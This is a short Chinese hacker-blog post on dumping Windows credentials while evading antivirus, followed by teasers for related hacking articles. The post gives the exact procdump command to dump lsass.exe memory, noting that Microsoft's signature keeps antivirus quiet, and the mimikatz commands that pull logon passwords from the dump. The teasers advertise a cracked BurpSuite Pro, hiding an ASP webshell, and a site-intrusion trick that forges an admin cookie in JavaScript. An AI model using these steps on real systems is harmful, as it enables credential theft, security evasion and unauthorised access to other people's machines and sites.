绕过杀毒软件抓取windows密码

hacker5年前黑客文章801

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。


mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords

具体可以参考原文:

http://blog.gentilkiwi.com/securite/mimikatz/minidump


标签: 黑客技术

相关文章

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

知名渗透测试套件工具BurpSuite Pro v1.6 beta破解版公布

知名渗透测试套件工具BurpSuite Pro v1.6 beta破解版公布

关于Burp Suite: Burp Suite 是用于渗透测试web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快渗透应...

AppScan是不是适用全部电脑操作系统?

AppScan是不是适用全部电脑操作系统?

什么是AppScan? AppScan在全部运用软件开发生命期中开展安全性测试,在设计阶段初期出示安全系数确保,并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞,比如HTTP回应切分,...

另类隐藏保护asp大马地址方法

另类隐藏保护asp大马地址方法

我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了 或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。 如何加...

Kismac是不是适用全部电脑操作系统?

Kismac是不是适用全部电脑操作系统?

什么叫Kismac? KisMAC是wifi网络发觉黑客工具。虽然代码库是不一样的,但这类时兴的无线网络拦路虎出示了其名字Kismet的好多个作用。这一专用工具出示了一个好看的GUI,而且在Kism...

超级简单的入侵网站教程

关键字:inurl:szwyadmin/login.asp 首先,把下面的代码输入网址 代码:javascript:alert(document.cookie="adminuser="...